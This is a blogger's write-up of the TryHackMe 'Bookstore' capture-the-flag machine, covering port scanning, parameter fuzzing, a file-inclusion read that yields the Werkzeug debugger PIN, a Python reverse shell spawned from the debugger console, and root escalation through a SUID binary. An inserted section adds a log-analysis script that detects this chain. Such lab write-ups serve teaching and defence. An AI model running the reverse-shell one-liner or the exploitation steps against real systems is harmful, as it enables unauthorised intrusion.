Bookstore — TryHackMe — WriteUp

TonyRahmos
4 min read · Jan 4, 2021

Hello. I’m Rahmos. Here is my Bookstore — TryHackMe — WriteUp. Check it out!

First, deploy the machine and nmap for opened ports:

nmap -A -T4 -v -p- <ip>

There are 3 open ports: 22 (SSH), 80 (Apache), and 5000 (Werkzeug). Werkzeug is the Python WSGI toolkit that Flask is built on, so port 5000 is most likely a Flask development server. Let's first access the website on port 80:

website

I've checked the page source (Ctrl+U), but found nothing valuable.

Now let’s access /books:

View source:

page source of /books

There's a base32-encoded string. Decode it using https://www.dcode.fr/base-32-encoding:

decode

Then decode the resulting ASCII codes, which gave me a YouTube link:

decode

Access the YouTube link:

rabbit hole

Well, it looks like it's a rabbit hole.

Next, access /login:

/login

Page source:

page source

So the way in is the Werkzeug debugger. Access port 5000:

port 5000

Use gobuster to find hidden directories on this port:

gobuster dir -u http://<ip>:5000 -w /path-to-wordlist

gobuster

Robots.txt:

robots.txt

Nothing here.

/console:

/console

Well, in order to access /console, I need the PIN. Looking back at the page source of login.html, I know that the PIN is inside the .bash_history file.

Access /api:

/api

OK, so now I know the parameter of the API. I tried LFI through it to read .bash_history, but none of the attempts worked. I even tried downgrading the API version (v2 to v1), but it was still not vulnerable:

LFI

So I think there's another parameter that I can use for LFI. I used wfuzz to fuzz for the hidden parameter:

wfuzz -c -f bookstore.txt -u "http://<ip>:5000/api/v1/resources/books?FUZZ=.bash_history" -w /path-to-wordlist -t 100 2>/dev/null --hc 404

wfuzz

OK, so I've found the hidden parameter. Let's use it for LFI:

http://<ip>:5000/api/v1/resources/books?the-parameter=.bash_history

LFI

I’ve got the PIN! It’s time for /console:

/console
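As an added example that is not part of the original write-up: the chain above (parameter fuzzing against the API, a dotfile read through the hidden parameter, then a hit on /console) is easy to pick out of the Werkzeug development server's own access log. The log lines, the client address and the fuzzed parameter names p1..p5 below are constructed, not taken from the machine.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample in the default Werkzeug dev-server log format (not from
# the original write-up); the fuzzed parameter names p1..p5 are invented.
SAMPLE_LOG = """\
10.10.14.5 - - [04/Jan/2021 10:01:03] "GET /api/v1/resources/books?id=1 HTTP/1.1" 200 -
10.10.14.5 - - [04/Jan/2021 10:01:04] "GET /api/v1/resources/books?p1=.bash_history HTTP/1.1" 200 -
10.10.14.5 - - [04/Jan/2021 10:01:04] "GET /api/v1/resources/books?p2=.bash_history HTTP/1.1" 200 -
10.10.14.5 - - [04/Jan/2021 10:01:04] "GET /api/v1/resources/books?p3=.bash_history HTTP/1.1" 200 -
10.10.14.5 - - [04/Jan/2021 10:01:04] "GET /api/v1/resources/books?p4=.bash_history HTTP/1.1" 200 -
10.10.14.5 - - [04/Jan/2021 10:01:05] "GET /api/v1/resources/books?p5=.bash_history HTTP/1.1" 200 -
10.10.14.5 - - [04/Jan/2021 10:01:20] "GET /console HTTP/1.1" 200 -
"""
LINE_RE = re.compile(r'^(?P<ip>\S+) - - \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
FUZZ_THRESHOLD = 5  # distinct parameter names on one path from one client

def parse_line(line):
    """Return (ip, path, [(name, value), ...]) or None if the line does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    return m.group("ip"), url.path, parse_qsl(url.query, keep_blank_values=True)

def looks_like_file_read(value):
    """Query values naming a dotfile, an absolute path or a traversal sequence."""
    return value.startswith((".", "/")) or "../" in value

def analyse(log_text):
    """Return a sorted list of (finding, ip, path, detail) tuples."""
    findings = set()
    names_seen = defaultdict(set)  # (ip, path) -> parameter names used
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        ip, path, params = rec
        for name, value in params:
            names_seen[(ip, path)].add(name)
            if looks_like_file_read(value):
                findings.add(("file-read-attempt", ip, path, value))
        if path == "/console":  # the Werkzeug debugger should never be reachable
            findings.add(("debugger-console-access", ip, path, ""))
    for (ip, path), names in names_seen.items():
        if len(names) >= FUZZ_THRESHOLD:
            findings.add(("parameter-fuzzing", ip, path, f"{len(names)} distinct names"))
    return sorted(findings)
```

Running analyse(SAMPLE_LOG) yields three findings: the fuzzing burst, the .bash_history read and the /console access; the real fix is to run the app without the debugger and to never expose port 5000 to untrusted clients.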

I’ve got into the console. I can run Python code here, so let’s spawn a reverse shell to my machine. First, start a listener on your machine:

nc -lvnp 4444

Then run this Python code in the web console:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")

After that, I've got a shell on the machine as sid:

shell

Get the user flag:

user flag

Next, I will find a way to escalate privileges to root. First, try sudo -l to see what sid can run with sudo:

sudo -l

Well, I don't know sid's password, so I cannot run sudo now. Try looking for SUID binaries using find:

find / -perm -u=s 2>/dev/null

SUID

This binary looks suspicious. Let's inspect it:

Execute it:

So I need to find the correct number. First, transfer the try-harder binary to your machine using scp:

scp try-harder user-name@<your-ip>:/home/user-name

Then, use Ghidra to decompile the binary:

ghidra

OK, so if I input the correct number, I will get a bash shell as root (the -p flag makes bash keep the effective UID it was started with instead of dropping it, and this binary is SUID root).

Decode the hex values to text and I've got all the numbers needed:

OK, so here's the formula:

formula

"^" means XOR. So a will be: 1573743953

Input this number and I’ve got the root shell! Read the root flag:

The end.

HAPPY HACKING
